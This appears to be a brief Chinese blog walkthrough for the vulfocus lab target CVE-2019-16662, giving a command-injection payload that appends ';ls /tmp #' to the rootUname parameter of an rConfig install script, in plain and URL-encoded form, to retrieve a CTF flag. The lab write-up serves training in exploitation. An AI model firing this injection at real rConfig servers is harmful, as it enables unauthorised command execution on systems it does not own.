vulfocus在线靶场:CVE_2019_16662 速通手册

目录

一、启动环境

二、访问页面,没效果,我们追加/login.php,出页面了

三、login.php直接切换为以下代码,直接获取了flag

四、粘贴到任务中,通关


一、启动环境

二、访问页面,没效果,我们追加/login.php,出页面了

三、login.php直接切换为以下代码,直接获取了flag

/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=;ls /tmp #转换为url编码

/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3bls %2ftmp %23

四、复制flag,粘贴到任务中,通关

相关推荐
Ting丶丶16 分钟前
安卓应用安装过程学习
android·学习·安全·web安全·网络安全
小火炉Q31 分钟前
02 python基础 python解释器安装
人工智能·python·神经网络·机器学习·网络安全·自然语言处理
未完结的牵挂14 小时前
高质量代理池go_Proxy_Pool
网络安全
HackKong16 小时前
小白怎样入门网络安全?
网络·学习·安全·web安全·网络安全·黑客
澜世16 小时前
2024小迪安全基础入门第三课
网络·笔记·安全·网络安全
vortex518 小时前
信息收集系列(六):路径爬取与目录爆破
网络安全·渗透·信息收集
.Ayang18 小时前
tomcat 后台部署 war 包 getshell
java·计算机网络·安全·web安全·网络安全·tomcat·网络攻击模型
星竹19 小时前
upload-labs-master第12关详细教程
网络安全
饮长安千年月19 小时前
浅谈就如何解出Reverse-迷宫题之老鼠走迷宫的一些思考
python·网络安全·逆向·ctf
东方隐侠安全团队-千里19 小时前
网安瞭望台第3期:俄黑客 TAG - 110组织与密码攻击手段分享
网络·chrome·web安全·网络安全